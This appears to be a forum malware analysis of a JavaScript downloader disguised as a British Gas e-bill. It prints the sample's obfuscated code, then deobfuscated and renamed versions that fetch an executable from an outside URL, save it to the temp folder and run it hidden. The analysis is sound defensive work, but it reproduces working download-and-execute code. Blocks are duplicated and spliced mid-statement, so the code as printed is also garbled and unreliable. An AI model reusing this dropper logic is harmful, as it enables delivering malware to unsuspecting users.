From Malware Vault sample pack : 26-8-16 #7
(Thanks to @Solarquest)
Sample 4 :
eBILL_BritishGas.js
Detection ratio: 3 / 56
Analysis date: 2016-08-26 09:43:39 UTC ( 5 hours, 17 minutes ago )
Same obfuscation method as:
(variable names and function names changed)
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
https://malwaretips.com/threads/2-fresh-scripted-samples-from-16-8-16-5-62456-js-vbs.62470/
Main part :
try {
...
...
...
Deobfuscated :
try {
...
...
...
Changing the names / simplification :
try {
...
...
...
A similar obfuscation method was used in other samples already analyzed (see the links posted above for more info).
The URL no longer works.
All I can say: the JS downloader only gets the file from the URL and tries to run it — it writes the response body to a temporary file in %TEMP% via ADODB.Stream and launches it through WScript.Shell.Run (no deobfuscation step like the one already seen in some previous versions of the JS/downloader Nemucod, which modified an obfuscated downloaded file to turn it into an exe file).
(Thanks to @Solarquest)
Sample 4 :
eBILL_BritishGas.js
Detection ratio: 3 / 56
Analysis date: 2016-08-26 09:43:39 UTC ( 5 hours, 17 minutes ago )
Same obfuscation method as:
(variable names and function names changed)
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
https://malwaretips.com/threads/2-fresh-scripted-samples-from-16-8-16-5-62456-js-vbs.62470/
Main part :
try {
...
...
...
var azbatkyn9 = ezypuk3[nocyqi[1] + ukrychifny[1] + ezownyzo3[1] + ifxixaknat4[2] + iveddimen3[1]];
var wcutpufy0 = kohypsol0[1] + kyxbytmop0[2] + odrulfisl0[0] + xixryjy0[1] + becapqixwo[2] + izdibgirj[1] + ywuddelti9[0];
var vivoqxulq = lohune1[0] + atefojw6[2] + wdobaltiri0[0] + emtevxykz[3];
var trilzodije0 = new bbivattegzy4(wcutpufy0);
var ubmogh3 = uzuzcozyhq7[0] + umilnenfovg8[1] + kvekcevgy[0] + eqnahlixso2[1];
var icdypvezuh0 = new bbivattegzy4(vivoqxulq);
var azanbekcu7 = new bbivattegzy4(ubmogh3);
var cnewgy7 = ankidalqe[2] + usgozbonerc4[1] + lexsigmyfy4[1] + ujuzohbub0[0] + pixawror2[1] + nagkisata[1] + fguxcinvu8[1] + qkugkuvorlo7[0] + ywuccoxe[1] + ctykorudgo[2] + ukicagedt5[0] + uzviziburt5[2] + uromcysgon[3] + bhuhutfev7[0];
icdypvezuh0[gamypebi[2]]();
azanbekcu7[faqoknecci5[1]](gnyjunykry4[2], cnewgy7, gvegudadj[1] - 68);
var wuku5 = tifowsovj[2] + vlyqymo0[2] + ditiza[0] + icicuby5[1];
var owonfy = trilzodije0[idonbom2[2] + swomhejy6[1] + ipdizyfebt[1] + brygcybu[1] + ismamubax[1] + mnycsezu0[0]](nzefafki5[0] - 339) + erhopyhx[3] + trilzodije0[rexuqto[3] + uclufjelco[1] + ohozgumo[0] + jsyzirzuro[0]]();
icdypvezuh0[afuwpoxho[1] + moqemvo4[3]] = fakkiwvaqu2[0] - 507;
azanbekcu7[kotdoman9[1]]();
icdypvezuh0[ewxenur[0] + zwadibjipy[1]] = jvojapjixt[1] - 504;
if (azanbekcu7[asfylil[3] + oditvifc[0]] == ofguxrasy[1] - 123) {
} catch (expalu6) {}var wcutpufy0 = kohypsol0[1] + kyxbytmop0[2] + odrulfisl0[0] + xixryjy0[1] + becapqixwo[2] + izdibgirj[1] + ywuddelti9[0];
var vivoqxulq = lohune1[0] + atefojw6[2] + wdobaltiri0[0] + emtevxykz[3];
var trilzodije0 = new bbivattegzy4(wcutpufy0);
var ubmogh3 = uzuzcozyhq7[0] + umilnenfovg8[1] + kvekcevgy[0] + eqnahlixso2[1];
var icdypvezuh0 = new bbivattegzy4(vivoqxulq);
var azanbekcu7 = new bbivattegzy4(ubmogh3);
var cnewgy7 = ankidalqe[2] + usgozbonerc4[1] + lexsigmyfy4[1] + ujuzohbub0[0] + pixawror2[1] + nagkisata[1] + fguxcinvu8[1] + qkugkuvorlo7[0] + ywuccoxe[1] + ctykorudgo[2] + ukicagedt5[0] + uzviziburt5[2] + uromcysgon[3] + bhuhutfev7[0];
icdypvezuh0[gamypebi[2]]();
azanbekcu7[faqoknecci5[1]](gnyjunykry4[2], cnewgy7, gvegudadj[1] - 68);
var wuku5 = tifowsovj[2] + vlyqymo0[2] + ditiza[0] + icicuby5[1];
var owonfy = trilzodije0[idonbom2[2] + swomhejy6[1] + ipdizyfebt[1] + brygcybu[1] + ismamubax[1] + mnycsezu0[0]](nzefafki5[0] - 339) + erhopyhx[3] + trilzodije0[rexuqto[3] + uclufjelco[1] + ohozgumo[0] + jsyzirzuro[0]]();
icdypvezuh0[afuwpoxho[1] + moqemvo4[3]] = fakkiwvaqu2[0] - 507;
azanbekcu7[kotdoman9[1]]();
icdypvezuh0[ewxenur[0] + zwadibjipy[1]] = jvojapjixt[1] - 504;
if (azanbekcu7[asfylil[3] + oditvifc[0]] == ofguxrasy[1] - 123) {
icdypvezuh0[lijqyzgex7[0] + etyflobne0[1]](azanbekcu7[hquckyfetsi[1] + iratic[1] + ahashaqu[1] + rmavwyteko[0]]);
var uwosewas = iwumitb[1] + hysepbyn7[2] + blumjuwof[1] + owonfy;
icdypvezuh0[xfosoxpa[0] + uzobvibe[1] + eqyqoqib5[1] + dlabaqtaf5[0]](owonfy);
icdypvezuh0[xqylxuldempi2[2] + yqkojurn9[1]]();
var omybcovcu8 = new bbivattegzy4(wuku5);
omybcovcu8[xuwsijudne[2]](uwosewas, gvegudadj[1] - 68);
}var uwosewas = iwumitb[1] + hysepbyn7[2] + blumjuwof[1] + owonfy;
icdypvezuh0[xfosoxpa[0] + uzobvibe[1] + eqyqoqib5[1] + dlabaqtaf5[0]](owonfy);
icdypvezuh0[xqylxuldempi2[2] + yqkojurn9[1]]();
var omybcovcu8 = new bbivattegzy4(wuku5);
omybcovcu8[xuwsijudne[2]](uwosewas, gvegudadj[1] - 68);
Deobfuscated :
try {
...
...
...
var wcutpufy0 = "Scripting.FileSystemObject";
var vivoqxulq ="ADODB.Stream";
var trilzodije0 = new ActiveXObject("Scripting.FileSystemObject");
var ubmogh3 = "MSXML2.XMLHTTP";
var icdypvezuh0 = new ActiveXObject("ADODB.Stream");
var azanbekcu7 = new ActiveXObject("MSXML2.XMLHTTP");
var cnewgy7 = "hxxp://www.numengo.com/wp-admin/file.exe";
icdypvezuh0.Open();
azanbekcu7.open("GET", cnewgy7, 0);
var wuku5 = "WScript.Shell";
var owonfy = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
icdypvezuh0.position = 0;
azanbekcu7.send();
icdypvezuh0.Type = 1;
if (azanbekcu7.Status == 200) {
} catch (expalu6) {}var vivoqxulq ="ADODB.Stream";
var trilzodije0 = new ActiveXObject("Scripting.FileSystemObject");
var ubmogh3 = "MSXML2.XMLHTTP";
var icdypvezuh0 = new ActiveXObject("ADODB.Stream");
var azanbekcu7 = new ActiveXObject("MSXML2.XMLHTTP");
var cnewgy7 = "hxxp://www.numengo.com/wp-admin/file.exe";
icdypvezuh0.Open();
azanbekcu7.open("GET", cnewgy7, 0);
var wuku5 = "WScript.Shell";
var owonfy = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
// "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
// %TEMP%\" +oFso.GetTempName()
// %TEMP%\" +oFso.GetTempName()
azanbekcu7.send();
icdypvezuh0.Type = 1;
if (azanbekcu7.Status == 200) {
icdypvezuh0.write(azanbekcu7.ResponseBody);
var uwosewas =""cmd.exe /c " +owonfy
icdypvezuh0.SaveToFile(owonfy);
icdypvezuh0.Close();
var omybcovcu8 = new ActiveXObject("WScript.Shell");
omybcovcu8.run(uwosewas,0);
}var uwosewas =""cmd.exe /c " +owonfy
icdypvezuh0.SaveToFile(owonfy);
icdypvezuh0.Close();
var omybcovcu8 = new ActiveXObject("WScript.Shell");
omybcovcu8.run(uwosewas,0);
Changing the names / simplification :
try {
...
...
...
var oStream = new ActiveXObject("ADODB.Stream");
var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
var URL = "hxxp://www.numengo.com/wp-admin/file.exe";
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var file = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName()
oStream.Open();
oHttp.open("GET", URL, 0);
oStream.position = 0;
oHttp.send();
oStream.Type = 1;
if (oHttp.Status == 200) {
} catch (expalu6) {}var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
var URL = "hxxp://www.numengo.com/wp-admin/file.exe";
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var file = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName()
// "%TEMP%\" +oFso.GetTempName()
// Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
// Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad27266.tmp";
oHttp.open("GET", URL, 0);
oStream.position = 0;
oHttp.send();
oStream.Type = 1;
if (oHttp.Status == 200) {
oStream.write(oHttp.ResponseBody);
var cmd ="cmd.exe /c "+ file;
oStream.SaveToFile(file);
oStream.Close();
var oShell = new ActiveXObject("WScript.Shell");
oShell.run(cmd,0);
}var cmd ="cmd.exe /c "+ file;
oStream.SaveToFile(file);
oStream.Close();
var oShell = new ActiveXObject("WScript.Shell");
oShell.run(cmd,0);
A similar obfuscation method was used in other samples already analyzed (see the links posted above for more info).
The URL no longer works.
All I can say: the JS downloader only gets the file from the URL and tries to run it — it writes the response body to a temporary file in %TEMP% via ADODB.Stream and launches it through WScript.Shell.Run (no deobfuscation step like the one already seen in some previous versions of the JS/downloader Nemucod, which modified an obfuscated downloaded file to turn it into an exe file).